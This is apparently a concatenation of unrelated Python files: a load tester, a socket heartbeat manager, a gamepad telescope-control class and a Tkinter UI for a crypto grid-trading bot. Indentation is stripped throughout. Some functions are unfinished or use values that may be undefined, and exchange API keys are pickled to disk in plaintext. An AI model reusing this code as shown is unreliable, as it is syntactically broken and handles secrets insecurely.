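# Minimal usage sketch (assumes an `mtapi` object exposing a private _update()
# method, per the call in locked_update above):
#
#     threader = _MtapiThreader(mtapi, expires_seconds=60)
#     threader.start_timer()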
|
__init__.py
|
from datetime import datetime, timedelta
from queue import Queue
from time import time, sleep
from threading import Thread
import json
# globals
json_log = []
class LoadTester:
def __init__(self,
duration_time,
request_time,
worker,
n_jobs: int = 30,
count: int = 10):
self.__count = count
        # deadline after which the load test stops; the original appended a
        # stray trailing comma (creating a tuple) and round-tripped it through
        # dateutil's parser, which a plain datetime expression makes unnecessary
        self.__d_time = datetime.now() + timedelta(minutes=int(duration_time))
self.__n_jobs = n_jobs
self.__q = Queue(self.__n_jobs * 2)
self.__request_time = request_time
self.__tasks_duration_per_iteration = 0
self.__tasks_finished = 0
self.__total_duration_per_task = 0
self.__worker = worker
def do_worker(self):
while True:
self.__q.get()
start_thread_time = time()
self.__worker()
thread_duration = time() - start_thread_time
self.__tasks_duration_per_iteration += thread_duration
self.__tasks_finished += 1
self.__q.task_done()
def start(self):
for i in range(self.__n_jobs):
thread = Thread(target=self.do_worker)
thread.daemon = True
thread.name = f"t{i}"
thread.start()
start_program_time = time()
iterations_count = 0
try:
print("starting iterations")
while True:
# counters
iterations_count += 1
self.__tasks_duration_per_iteration = 0
# starting to count time of the iteration
start_iteration_time = time()
for i in range(self.__count):
self.__q.put((i, i))
self.__q.join()
iteration_duration = time() - start_iteration_time
self.__total_duration_per_task += self.__tasks_duration_per_iteration
print(f"iteration {iterations_count} finished in {iteration_duration:.2f}s, "
f"average thread duration is {self.__tasks_duration_per_iteration / self.__n_jobs:.2f}s, "
f"sum of thread durations is {self.__tasks_duration_per_iteration:.2f}s")
request_data = {
"IterationNumber": f"{iterations_count}",
"Values": {
"RequestDone": f"{self.__count}",
"AverageDurationPerRequest": f"{iteration_duration:.2f}s",
"SumOfRequestDurations": f"{self.__tasks_duration_per_iteration:.2f}s"
}
}
json_log.append(request_data)
with open("request_log.json", "w+") as fl:
fl.write(json.dumps(json_log, indent=2))
if self.__d_time < datetime.now():
raise KeyboardInterrupt
sleep(self.__request_time)
except KeyboardInterrupt:
program_duration = time() - start_program_time
average_task_duration = self.__total_duration_per_task / self.__tasks_finished \
if self.__tasks_finished != 0 else 0
print("Program finished. Results:")
print(f"\tTotal time: {program_duration:.2f}s")
print(f"\tTasks accomplished: {self.__tasks_finished}")
print(f"\tAverage task duration: {average_task_duration:.2f}s")
|
bio_thread_io_manager.py
|
import socket
from bio_client import *
from socket_channel import *
import time
import threading
class BioThreadIoManager:
def __init__(self, s: socket, client):
self.client = client
self.socketChannel = SocketChannel(s)
self.running = False
def send(self, msg):
self.socketChannel.writeAndFlush(msg)
def close(self):
self.running = False
self.socketChannel.close()
def startThread(self):
self.running = True
self.heartbeatThread = threading.Thread(target=self.__heartbeat__)
self.ioloopThread = threading.Thread(target=self.__ioloop__)
self.heartbeatThread.start()
self.ioloopThread.start()
def __heartbeat__(self):
while self.running:
try:
self.send('heartbeat-' + self.client.userId)
            except Exception:
                print('failed to send heartbeat')
time.sleep(10)
        print('heartbeat stopped!')
self.close()
def __ioloop__(self):
while self.running:
try:
                line = self.socketChannel.readLine()
                self.client.onMessage(line)
except Exception as e:
                print('connection error, reconnecting in 5s')
time.sleep(5)
self.client.reconnect()
break
print ("ioloop thread stop!")
self.close()
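# Minimal usage sketch (assumes a connected TCP socket `sock` and a client
# object exposing userId, onMessage() and reconnect(), as used above):
#
#     mgr = BioThreadIoManager(sock, client)
#     mgr.startThread()   # spawns the heartbeat and read-loop threads
#     mgr.send('hello')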
|
gamepad.py
|
"""Gamepad support.
Defines a single class Gamepad that provide support for game controller interfaces. When run as a
program the integrated x- and y- values are printed to the console.
"""
from datetime import datetime
import os
import signal
import threading
import time
from typing import List
import selectors
import inputs
import numpy as np
import click
from influxdb_client import Point
from track.telem import TelemSource
class Gamepad(TelemSource):
"""Class for interfacing with gamepads.
This class implements some useful functionality to allow a human to control
the telescope either fully manually or to interact with a control loop
by providing correction feedback.
Attributes:
left_x: A floating point value representing the x-axis position of the
left analog stick with values normalized to [-1.0, +1.0].
left_y: A floating point value representing the y-axis position of the
left analog stick with values normalized to [-1.0, +1.0].
right_x: A floating point value representing the x-axis position of the
right analog stick with values normalized to [-1.0, +1.0].
right_y: A floating point value representing the y-axis position of the
right analog stick with values normalized to [-1.0, +1.0].
int_x: The integrated value of the x-axes of both analog sticks.
int_y: The integrated value of the y-axes of both analog sticks.
left_gain: The gain applied to the left analog stick integrator input.
right_gain: The gain applied to the right analog stick integrator input.
int_loop_period: The period of the integrator thread loop in seconds.
int_limit: The integrators will be limited to this absolute value.
callbacks: A dict where keys are event codes and values are callback function handles.
state: A dict storing the last received event.state for each event.code.
gamepad: An instance of a gamepad object from the inputs package.
input_thread: A thread reading input from the gamepad.
integrator_thread: A thread for integrating the analog stick values.
integrator_mode: A boolean set to True when integrator mode is active.
running: Threads will stop executing when this is set to False.
sel: An object of type selectors.BaseSelector used to check if gamepad has data to read.
"""
MAX_ANALOG_VAL = 2**15
DEAD_ZONE_MAG = 256
def __init__(
self,
left_gain=1.0,
right_gain=0.1,
int_limit=1.0,
int_loop_period=0.1
):
"""Inits Gamepad object.
Initializes a Gamepad object and starts two daemon threads to read
input from the gamepad and to integrate the analog stick inputs. This
will use the first gamepad found by the inputs package.
Args:
left_gain: Gain for the left analog stick integrator input.
right_gain: Gain for the right analog stick integrator input.
int_limit: Absolute value of integrators will be limited to this.
            int_loop_period: Period in seconds for the integrator thread loop.
"""
self.left_x = 0.0
self.left_y = 0.0
self.right_x = 0.0
self.right_y = 0.0
self.int_x = 0.0
self.int_y = 0.0
self.left_gain = left_gain
self.right_gain = right_gain
self.int_loop_period = int_loop_period
self.int_limit = int_limit
self.callbacks = {}
self.state = {'ABS_X': 0, 'ABS_Y': 0, 'ABS_RX': 0, 'ABS_RY': 0}
num_gamepads_found = len(inputs.devices.gamepads)
if num_gamepads_found < 1:
raise RuntimeError('No gamepads found')
elif num_gamepads_found > 1:
print(f'Found {num_gamepads_found} gamepads:')
for idx, gamepad in enumerate(inputs.devices.gamepads):
print(f'{idx:2d}: {gamepad.name}')
selected_index = click.prompt('Which one?', default=0)
else:
selected_index = 0
self.gamepad = inputs.devices.gamepads[selected_index]
self.input_thread = threading.Thread(target=self.__get_input, name='Gamepad: input thread')
self.integrator_thread = threading.Thread(
target=self.__integrator,
name='Gamepad: integrator thread'
)
self.integrator_mode = False
self.running = True
self.debug_prints = False
# Use a selector on the character device that the inputs package reads from so that we
# can avoid blocking on calls to gamepad.read() in the input_thread loop. Calls that block
# indefinitely make it impossible to stop the thread which then makes clean program
# shutdown difficult or impossible. Daemon threads were used previously but daemon threads
# are not shut down cleanly.
self.sel = selectors.DefaultSelector()
self.sel.register(self.gamepad._character_device, selectors.EVENT_READ)
self.input_thread.start()
self.integrator_thread.start()
def stop(self):
"""Stops the threads from running."""
self.running = False
self.input_thread.join()
self.integrator_thread.join()
def get_proportional(self):
"""Returns a tuple containing the instantaneous x/y values."""
x = np.clip(self.left_gain*self.left_x + self.right_gain*self.right_x, -1.0, 1.0)
y = np.clip(self.left_gain*self.left_y + self.right_gain*self.right_y, -1.0, 1.0)
return (x, y)
def get_integrator(self):
"""Returns a tuple containing the integrated x/y values."""
return (self.int_x, self.int_y)
def get_value(self):
"""Returns a tuple containing instantaneous or integrated x/y values based on mode."""
if self.integrator_mode:
return self.get_integrator()
else:
return self.get_proportional()
def register_callback(self, event_code=None, callback=None):
"""Register a callback function to be called when a particular gamepad event occurs.
Args:
event_code: The event code as a string. For example, if set to 'ABS_X', the callback
                function will be called any time an event with that code is detected.
callback: Function to be called. The function should take a single argument which will
be set to event.state for the matching event code. Set to None to remove the
callback for this code. Only one callback can be registered per event code.
"""
self.callbacks[event_code] = callback
def _update_analog(self, stick: str) -> None:
"""Convert integer analog stick values to floating point"""
if stick == 'left':
raw_vector = self.state['ABS_X'] - 1j*self.state['ABS_Y']
elif stick == 'right':
raw_vector = self.state['ABS_RX'] - 1j*self.state['ABS_RY']
else:
raise ValueError("stick must be 'left' or 'right'")
raw_mag = abs(raw_vector)
# scaled dead zone algorithm
# https://www.gamasutra.com/blogs/JoshSutphin/20130416/190541/Doing_Thumbstick_Dead_Zones_Right.php
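        # Worked example: a raw magnitude of 2**14 maps to
        # (16384 - 256) / (32768 - 256) ~= 0.496, while any magnitude below
        # DEAD_ZONE_MAG collapses to 0.0; the stick angle is preserved either way.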
if raw_mag >= self.DEAD_ZONE_MAG:
scaled_mag = (raw_mag - self.DEAD_ZONE_MAG) / (self.MAX_ANALOG_VAL - self.DEAD_ZONE_MAG)
else:
scaled_mag = 0.0
scaled_vector = scaled_mag * np.exp(1j*np.angle(raw_vector))
if stick == 'left':
self.left_x = scaled_vector.real
self.left_y = scaled_vector.imag
elif stick == 'right':
self.right_x = scaled_vector.real
self.right_y = scaled_vector.imag
def __get_input(self):
"""Thread for reading input from gamepad"""
# Make sure this thread does not have realtime priority
os.sched_setscheduler(0, os.SCHED_OTHER, os.sched_param(0))
while True:
if not self.running:
return
# use select() to check if events are waiting to avoid blocking on read()
if self.sel.select(timeout=0.1):
# call to read() is blocking
events = self.gamepad.read()
for event in events:
# cache the raw state of this event
self.state[event.code] = event.state
if event.code == 'ABS_X':
self._update_analog('left')
elif event.code == 'ABS_Y':
self._update_analog('left')
elif event.code == 'ABS_RX':
self._update_analog('right')
elif event.code == 'ABS_RY':
self._update_analog('right')
elif event.code == 'BTN_NORTH' and event.state == 1:
self.int_x = 0.0
elif event.code == 'BTN_WEST' and event.state == 1:
self.int_y = 0.0
elif event.code == 'BTN_TL' and event.state == 1:
self.integrator_mode = False
elif event.code == 'BTN_TR' and event.state == 1:
self.integrator_mode = True
# call any callbacks registered for this event.code
callback = self.callbacks.get(event.code, None)
if callback is not None:
callback(event.state)
if self.debug_prints:
print(event.code + ': ' + str(event.state))
def __integrator(self):
"""Thread function for integrating analog stick values.
Inputs from both analog sticks are multiplied by the respective gains
and integrated. This is done in a separate thread so that the
integrators can continue running even when the input thread is blocked
waiting for new events from the controller.
"""
# Make sure this thread does not have realtime priority
os.sched_setscheduler(0, os.SCHED_OTHER, os.sched_param(0))
while True:
time_loop_start = time.perf_counter()
if not self.running:
return
if self.integrator_mode:
self.int_x += self.left_gain * self.int_loop_period * self.left_x
self.int_y += self.left_gain * self.int_loop_period * self.left_y
self.int_x += self.right_gain * self.int_loop_period * self.right_x
self.int_y += self.right_gain * self.int_loop_period * self.right_y
self.int_x = np.clip(self.int_x, -self.int_limit, self.int_limit)
self.int_y = np.clip(self.int_y, -self.int_limit, self.int_limit)
time_elapsed = time.perf_counter() - time_loop_start
time_sleep = self.int_loop_period - time_elapsed
if time_sleep > 0:
time.sleep(time_sleep)
def get_telem_points(self) -> List[Point]:
"""Called by telemetry logger. See `TelemSource` abstract base class."""
point = Point('gamepad')
# attributes of this object to be captured as fields in the telemetry measurement
names = ['left_x', 'left_y', 'right_x', 'right_y', 'int_x', 'int_y', 'integrator_mode']
for name in names:
point.field(name, self.__dict__[name])
point.time(datetime.utcnow())
point_raw = Point.from_dict({
'measurement': 'gamepad_events',
'fields': self.state,
'time': datetime.utcnow(),
})
return [point, point_raw]
def main():
"""Prints all gamepad events received"""
gamepad = Gamepad()
gamepad.debug_prints = True
try:
signal.pause()
except KeyboardInterrupt:
gamepad.stop()
print('goodbye')
if __name__ == "__main__":
main()
|
Simplicity.py
|
import os, sys
import pickle
import threading, time
import requests
import tkinter as tk
import exchange
from exchange import exchangeInfo
import gridBot
from gridBot import gridBotStart
from os import path
from datetime import datetime
from tkinter import *
from tkinter import messagebox
from PIL import Image, ImageTk
from functools import partial
from sys import exit
'''
Pre-Reqs
--------
Download and install python3 with pip
In a console or terminal run:
pip install Pillow
pip install requests
(Linux only) sudo apt install python3-tk
Once all packages are installed please run this python script to start the UI
'''
#StaticVariables
CANVASHEIGHT=600
CANVASWIDTH=500
FRAMEHEIGHT=0.8
FRAMEWIDTH=0.8
FRAMEPADX=0.1
FRAMEPADY=0.125
BTNPADX_L=14
BTNPADX_S=10
BTNPADX_M=12
BTNPADY=5
HISTORYWIDTH=47
HISTORYHEIGHT=27.4
if os.name != "nt":
CANVASHEIGHT=600
CANVASWIDTH=700
FRAMEHEIGHT=0.8
FRAMEWIDTH=0.8
FRAMEPADX=0.1
FRAMEPADY=0.125
BTNPADX_L=24
BTNPADX_S=20
BTNPADX_M=22
BTNPADY=7
HISTORYWIDTH=66
HISTORYHEIGHT=25
#UI Colors
CANVASBG = "black"
BACKGROUND = CANVASBG
FOREGROUND = "white"
BTNBG = "grey"
BTNCLICKEDBG = "blue"
BTNFG = "black"
BTNCLICKEDFG = "white"
BTNFRAMEBG = CANVASBG
def initializeBot():
#Load telegram settings
if not os.path.exists("telegramSettings.conf"):
with open('telegramSettings.conf', 'wb') as f:
pickle.dump([False, "", ""], f)
with open('telegramSettings.conf', 'rb') as f:
isTelegramEnabled, getTelegramToken, getTelegramChatID = pickle.load(f)
if isTelegramEnabled:
enableTelegramChk.select()
telegramCheckBoxChanged()
tokenBox.delete(0, tk.END)
tokenBox.insert(tk.END, getTelegramToken.strip())
chatIDBox.delete(0, tk.END)
chatIDBox.insert(tk.END, getTelegramChatID.strip())
if isTelegramEnabled:
sendTelegramMessage("An instance of your Simplicity COSS bot was just launched. If this wasn't you please login to your COSS account and disable your API keys immediately.", False)
#Clear all frames
def clearFrames():
homeFrame.place_forget()
settingsFrame.place_forget()
runFrame.place_forget()
aboutFrame.place_forget()
historyFrame.place_forget()
botOptionsFrame.place_forget()
gridStratFrame.place_forget()
blStratFrame.place_forget()
homeBtn.config(bg=BTNBG, fg=BTNFG)
runBtn.config(bg=BTNBG, fg=BTNFG)
settingsBtn.config(bg=BTNBG, fg=BTNFG)
aboutBtn.config(bg=BTNBG, fg=BTNFG)
historyBtn.config(bg=BTNBG, fg=BTNFG)
botOptionBtn.config(bg=BTNBG, fg=BTNFG)
#Create function for run button
def openHome():
'''
Switches frames to the home tab
'''
clearFrames()
homeBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
homeFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
#Create function for settings/strategy button
def openSettings():
'''
Switches frames to the settings tab
'''
clearFrames()
settingsBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
settingsFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
gridStratFrame.place(relwidth=FRAMEWIDTH*0.9, relheight=FRAMEHEIGHT/1.8, relx=FRAMEPADX*1.4, rely=FRAMEPADY*3.1)
#Load all grid strategy settings
# Load Grid Settings
with open('gridSettings.conf', 'rb') as f: # Python 3: open(..., 'rb')
quotesPair, tradePair, publicKey, privateKey, orderSize, gridDistance, lowerBuyPrice, higherBuyPrice, lowerSellPrice, higherSellPrice, numberGrids = pickle.load(f)
quotePair.set(quotesPair)
publicAPIKeyBox.delete(0, tk.END)
publicAPIKeyBox.insert(tk.END, publicKey)
privateAPIKeyBox.delete(0, tk.END)
privateAPIKeyBox.insert(tk.END, privateKey)
orderSizeBox.delete('1.0', tk.END)
orderSizeBox.insert(tk.END, orderSize)
gridDistanceBox.delete('1.0', tk.END)
gridDistanceBox.insert(tk.END, gridDistance)
#buyPriceLowerBox.delete('1.0', tk.END)
#buyPriceLowerBox.insert(tk.END, lowerBuyPrice)
#buyPriceHigherBox.delete('1.0', tk.END)
#buyPriceHigherBox.insert(tk.END, higherBuyPrice)
#sellPriceLowerBox.delete('1.0', tk.END)
#sellPriceLowerBox.insert(tk.END, lowerSellPrice)
#sellPriceHigherBox.delete('1.0', tk.END)
#sellPriceHigherBox.insert(tk.END, higherSellPrice)
numberOfGrids.set(numberGrids)
quotePairChanged(None, tradePair)
#Create function for run button
def openRun():
'''
Switches frames to the run tab
'''
#Load Strategy Settings
with open('gridSettings.conf', 'rb') as f: # Python 3: open(..., 'rb')
quotePairRun, tradePairRun, publicAPIKey, privateAPIKey, orderSize, gridDistance, temp, temp, temp, temp, numberOfGrids = pickle.load(f)
clearFrames()
runBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
#Check if API keys are correct
loadPrice = exchangeInfo(publicAPIKey, privateAPIKey)
#Get latest current price
try:
latestPairPrice = loadPrice.getPairPrice(quotePairRun, tradePairRun)
    except Exception:
print("There was an error when fetching pair price")
#Calculate start buy/sell and stop price ranges automatically
if float(gridDistance) >= float(latestPairPrice):
messagebox.showinfo("Warning", "Your grid distance cannot be greater than or equal to the current price of the pair! Please adjust your strategy")
openSettings()
return 0
startBuyPrice = round(float(latestPairPrice) - float(gridDistance), 8)
startSellPrice = round(float(latestPairPrice) + float(gridDistance), 8)
stopBuyPrice = round((startBuyPrice - (float(gridDistance) * (float(numberOfGrids)/2))) - float(gridDistance), 9)
stopSellPrice = round((startSellPrice + (float(gridDistance) * (float(numberOfGrids)/2))) + float(gridDistance), 9)
#Update information in text fields
runStrategyBox.config(state="normal")
runStrategyBox.delete('1.0', tk.END)
runStrategyBox.insert(tk.END, "Grid MM")
runStrategyBox.config(state="disabled")
runTradePairBox.config(state="normal")
runTradePairBox.delete('1.0', tk.END)
runTradePairBox.insert(tk.END, tradePairRun + "_" + quotePairRun)
runTradePairBox.config(state="disabled")
runInstanceNameBox.delete('1.0', tk.END)
runInstanceNameBox.insert(tk.END, "Grid MM" + "_" + tradePairRun + "_" + quotePairRun)
startBuyBox.delete('1.0', tk.END)
startBuyBox.insert(tk.END, floatToStr(startBuyPrice))
startSellBox.delete('1.0', tk.END)
startSellBox.insert(tk.END, floatToStr(startSellPrice))
stopBuyBox.delete('1.0', tk.END)
stopBuyBox.insert(tk.END, floatToStr(stopBuyPrice))
stopSellBox.delete('1.0', tk.END)
stopSellBox.insert(tk.END, floatToStr(stopSellPrice))
balancesRequired = calcRequiredBalance()
quoteBalanceUseLabel.config(text=" Amount of " + quotePairRun + " needed for strategy:")
tradeBalanceUseLabel.config(text=" Amount of " + tradePairRun + " needed for strategy:")
quoteBalanceUseBox.config(state="normal")
quoteBalanceUseBox.delete('1.0', tk.END)
quoteBalanceUseBox.insert(tk.END, str(balancesRequired[0]))
quoteBalanceUseBox.config(state="disabled")
tradeBalanceUseBox.config(state="normal")
tradeBalanceUseBox.delete('1.0', tk.END)
tradeBalanceUseBox.insert(tk.END, str(balancesRequired[1]))
tradeBalanceUseBox.config(state="disabled")
runFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
#Create function for about button
def openAbout():
'''
Switches frames to the about tab
'''
clearFrames()
aboutBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
aboutFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
#Create function for history button
def openHistory():
'''
    Switches frames to the history tab
'''
clearFrames()
historyBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
historyFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
#Create function for botOptions button
def openOptions():
'''
Switches frames to the options setting tab
'''
clearFrames()
botOptionBtn.config(bg=BTNCLICKEDBG, fg=BTNCLICKEDFG)
botOptionsFrame.place(relwidth=FRAMEHEIGHT, relheight=FRAMEWIDTH, relx=FRAMEPADX, rely=FRAMEPADY)
def historyRefresh():
while True:
if os.path.exists("history.txt"):
with open("history.txt", "rb") as f2:
f2.seek(0)
historyTextField.delete("1.0", tk.END)
historyTextField.insert(tk.END, f2.read())
historyTextField.see("end")
time.sleep(10)
def tradingPairChanged(event, pair):
'''
Update settings page with new trading pair
'''
if pair is not None:
tradingPair.set(pair)
tradePairBalanceLabel.config(text=" Trade Balance (" + tradingPair.get() + ")")
orderSizeLabel.config(text=" Order Size (" + tradingPair.get() + ")")
#Load selected pair balances
balances = {
"quote": 0.0,
"trade": 0.0
}
balancePublicKey = publicAPIKeyBox.get().strip()
balancePrivateKey = privateAPIKeyBox.get().strip()
balanceKeys = exchangeInfo(balancePublicKey, balancePrivateKey)
try:
balances = balanceKeys.getCryptoBalance(quotePair.get(), tradingPair.get())
    except Exception:
print("There was some error when loading balances")
if "quote" in balances:
quotePairBalanceBox.config(state="normal")
quotePairBalanceBox.delete('1.0', tk.END)
quotePairBalanceBox.insert(tk.END, balances["quote"])
quotePairBalanceBox.config(state="disabled")
tradePairBalanceBox.config(state="normal")
tradePairBalanceBox.delete('1.0', tk.END)
tradePairBalanceBox.insert(tk.END, balances["trade"])
tradePairBalanceBox.config(state="disabled")
else:
print("Cannot access balances due to API error")
quotePairBalanceBox.config(state="normal")
quotePairBalanceBox.delete('1.0', tk.END)
quotePairBalanceBox.insert(tk.END, "N/A")
quotePairBalanceBox.config(state="disabled")
tradePairBalanceBox.config(state="normal")
tradePairBalanceBox.delete('1.0', tk.END)
tradePairBalanceBox.insert(tk.END, "N/A")
tradePairBalanceBox.config(state="disabled")
pairPrice = 0
try:
pairPrice = balanceKeys.getPairPrice(quotePair.get(), tradingPair.get())
    except Exception:
print("There was an error when fetching pair price")
currentPriceBox.config(state="normal")
currentPriceBox.delete('1.0', tk.END)
currentPriceBox.insert(tk.END, pairPrice)
currentPriceBox.config(state="disabled")
def quotePairChanged(event, trade=None):
#Update trading pair options
allPairs = myExchange.getAllPairs(str(quotePair.get()))
allPairs.sort()
tradingPair.set(allPairs[0])
pairMenu['menu'].delete(0, 'end')
# Insert list of new options (tk._setit hooks them up to var)
new_choices = allPairs
for choice in new_choices:
pairMenu['menu'].add_command(label=choice, command=partial(tradingPairChanged, None, choice))
tradingPairChanged(None, trade)
quotePairBalanceLabel.config(text=" Quote Balance (" + quotePair.get() + ")")
#buyRangeLabel.config(text=" Stop Price Range (" + quotePair.get() + ")")
#sellRangeLabel.config(text=" Start Buy / Sell (" + quotePair.get() + ")")
gridDistanceLabel.config(text=" Grid Distance (" + quotePair.get() + ")")
currentPriceLabel.config(text=" Current Price (" + quotePair.get() + ")")
def stratMenuChanged(event):
'''
Update settings UI to reflect changed strategy
'''
if tradingStrat.get() == "Buy Low Sell High":
tradingStrat.set(tradingStratOptions[0])
messagebox.showinfo("Alert", "This strategy is not yet supported")
elif tradingStrat.get() == "GRID MM":
blStratFrame.place_forget()
gridStratFrame.place(relwidth=FRAMEWIDTH*0.9, relheight=FRAMEHEIGHT/1.9, relx=FRAMEPADX*1.4, rely=FRAMEPADY*3.1)
#print("Strategy was changed to " + tradingStrat.get())
def saveStrategy():
    global myExchange  #update the module-level exchange instance (the original assigned to an unused local)
#Check if API keys are correct
testPublicKey = publicAPIKeyBox.get().strip()
testPrivateKey = privateAPIKeyBox.get().strip()
testKeys = exchangeInfo(testPublicKey, testPrivateKey)
testConnection = testKeys.testKey()
if testConnection:
messagebox.showinfo("Saved", "Your strategy settings will be applied")
myExchange = testKeys
else:
messagebox.showinfo("Invalid", "Looks like you entered invalid API keys. Please try again!")
return 0
#Save all settings to gridSettings.conf
with open('gridSettings.conf', 'wb') as f:
pickle.dump([quotePair.get().strip(), tradingPair.get().strip(), testPublicKey, testPrivateKey, orderSizeBox.get("1.0", tk.END).strip(), gridDistanceBox.get("1.0", tk.END).strip(), 0, 0, 0, 0, numberOfGrids.get()], f)
openRun()
return 1
def floatToStr(originalNumber):
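    # Formats a float without scientific notation; for values below 1 it keeps
    # roughly four significant digits (e.g. 0.000123456 -> "0.0001234").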
actualNumber = float(originalNumber)
decimalCount = 0
while actualNumber < 1:
actualNumber = actualNumber * 10
decimalCount = decimalCount + 1
    if float(originalNumber) < 1:
myString = "0."
for i in range(decimalCount-1):
myString = myString + "0"
myString = myString + str(int(float(originalNumber) * (10**(decimalCount+3))))
else:
myString = str(actualNumber)
return myString
def startStrategy():
#Load saved settings and append prices then save
with open('gridSettings.conf', 'rb') as f:
quotePair, tradePair, publicKey, privateKey, orderSize, gridDistance, temp, temp, temp, temp, numberOfGrids = pickle.load(f)
with open('gridSettings.conf', 'wb') as f:
pickle.dump([quotePair, tradePair, publicKey, privateKey, orderSize, gridDistance, stopBuyBox.get("1.0", tk.END), startBuyBox.get("1.0", tk.END), startSellBox.get("1.0", tk.END), stopSellBox.get("1.0", tk.END), numberOfGrids], f)
    strategyWithArg = partial(strategyThread, runInstanceNameBox.get("1.0", tk.END).strip().replace(" ", ""))
strategyTestThread = threading.Thread(target=strategyWithArg)
strategyTestThread.daemon = True
strategyTestThread.start()
openHistory()
def strategyThread(name):
myGridBot = gridBotStart
myGridBot.gridStart(name)
def autoStrategy():
#Build Strategy settings automatically for user
pairPrice = 0
userQuoteBalance = 0
userTradeBalance = 0
    useMaxBalance = tk.messagebox.askquestion('Warning','When using the auto strategy option Simplicity uses your maximum balances available. Once the strategy is autoconfigured you can simply reduce the balance used by lowering the order size or reducing the number of grids. Would you like to continue?')
if useMaxBalance == "no":
return 0
messagebox.showinfo("Alert", "Simplicity will now gather some data. This may take a few seconds.")
#Get pair data from exchange
#Load selected pair balances
balances = {
"quote": 0.0,
"trade": 0.0
}
balancePublicKey = publicAPIKeyBox.get().strip()
balancePrivateKey = privateAPIKeyBox.get().strip()
balanceKeys = exchangeInfo(balancePublicKey, balancePrivateKey)
try:
balances = balanceKeys.getCryptoBalance(quotePair.get(), tradingPair.get())
    except Exception:
print("There was some error when loading balances")
messagebox.showinfo("Error", "There was some error when loading balances. Strategy could not be automatically configured")
return 0
    userQuoteBalance = float(balances["quote"])
    userTradeBalance = float(balances["trade"])
try:
pairPrice = balanceKeys.getPairPrice(quotePair.get(), tradingPair.get())
    except Exception:
print("There was an error when fetching pair price")
messagebox.showinfo("Error", "There was an error when fetching pair price. Strategy could not be automatically configured")
return 0
calcOrderSize = 0
calcGridDistance = 0
calcStartBuy = 0
calcStartSell = 0
calcLowPrice = 0
calcHighPrice = 0
calcGrids = 0
def calcRequiredBalance():
balancesRequired = [0, 0]
#Load Strategy Settings
with open('gridSettings.conf', 'rb') as f: # Python 3: open(..., 'rb')
quoteCalc, tradeCalc, temp, temp, orderSize, gridDistance, temp, temp, temp, temp, numberOfGrids = pickle.load(f)
oneSideGrids = int(numberOfGrids)/2
buyStartPrice = float(startBuyBox.get("1.0", tk.END))
sellStartPrice = float(startSellBox.get("1.0", tk.END))
#Calculate quote balance required
total = 0
currentPrice = float(buyStartPrice)
if numberOfGrids > 3:
for x in range(int(oneSideGrids)):
total = total + (float(orderSize) * float(currentPrice))
currentPrice = currentPrice - float(gridDistance)
total = round(total, 8)
else:
total = round(float(orderSize) * float(currentPrice), 8)
balancesRequired[0] = total
#Calculate trade balance required
tradeBalance = float(float(orderSize) * int(oneSideGrids))
balancesRequired[1] = tradeBalance
#Return balances
return balancesRequired
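#Worked example (hypothetical values): with orderSize=0.015, gridDistance=0.000001,
#startBuy=1.0 and numberOfGrids=10, the quote side needs roughly 5 * 0.015 * 1.0
#= 0.075 of the quote asset and the trade side exactly 0.015 * 5 = 0.075 of the
#traded asset.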
def cancelAllOrders():
cancelAnswer = tk.messagebox.askquestion('Stop strategy?','Are you sure you want to stop the strategy and cancel all your orders? (Note: If you just want to restart the bot and not cancel orders, click no on this message and just close the window and re-start the bot from the run page)')
if cancelAnswer == 'yes':
print("Attempting to cancel all orders")
cancelBot = gridBotStart
cancelBot.cancelAndExit()
print("Bot will exit in 5 seconds! You can restart the bot to re-run the strategy.")
time.sleep(5)
exit(0)
def telegramCheckBoxChanged():
if telegramVar.get() == 0:
confirmDisableTelegram = messagebox.askquestion('Disable Telegram', 'Are you sure you want to disable telegram alerts?')
if confirmDisableTelegram == 'no':
enableTelegramChk.select()
return 0
with open('telegramSettings.conf', 'wb') as f:
pickle.dump([False, tokenBox.get().strip(), chatIDBox.get().strip()], f)
testTelegramBtn.config(state="disabled")
tokenBox.config(state="disabled")
chatIDBox.config(state="disabled")
else:
testTelegramBtn.config(state="normal")
tokenBox.config(state="normal")
chatIDBox.config(state="normal")
with open('telegramSettings.conf', 'rb') as f: # Python 3: open(..., 'rb')
temp, getTelegramTokenChange, getTelegramChatIDChange = pickle.load(f)
tokenBox.delete(0, tk.END)
tokenBox.insert(tk.END, getTelegramTokenChange.strip())
chatIDBox.delete(0, tk.END)
chatIDBox.insert(tk.END, getTelegramChatIDChange.strip())
#messagebox.showinfo("Telegram Enabled", "To enable telegram alerts please insert your Telegram bot token and chat ID then press the 'Test and Save' button to enable.")
def sendTelegramMessage(message, isATest):
'''
Send a Telegram message to users telegram bot
'''
if isATest:
telegramToken = tokenBox.get().strip()
telegramChatID = chatIDBox.get().strip()
messagebox.showinfo("Telegram Test", "The bot will now send a message to your telegram bot and save your telegram settings. If you don't recieve it please confirm your token and chat ID are correct and try again.")
messageSender = 'https://api.telegram.org/bot' + telegramToken + '/sendMessage?chat_id=' + telegramChatID + '&parse_mode=Markdown&text=' + message
#Save all settings to gridSettings.conf
with open('telegramSettings.conf', 'wb') as f:
pickle.dump([isATest, telegramToken, telegramChatID], f)
else:
telegramToken = tokenBox.get()
telegramChatID = chatIDBox.get()
messageSender = 'https://api.telegram.org/bot' + telegramToken + '/sendMessage?chat_id=' + telegramChatID + '&parse_mode=Markdown&text=' + message
response = requests.get(messageSender)
return response.json()
#Create an instance of exchange object and check connection
myExchange = exchangeInfo()
#Create the root UI
root = tk.Tk()
#root.configure(bg='#282923')
root.resizable(False, False)
if os.name == "nt":
root.attributes('-alpha', 0.97)
#Define Main UI elements
canvas = tk.Canvas(root, height=CANVASHEIGHT, width=CANVASWIDTH, bg=CANVASBG)
btnFrame = tk.Frame(root, bg=BTNFRAMEBG)
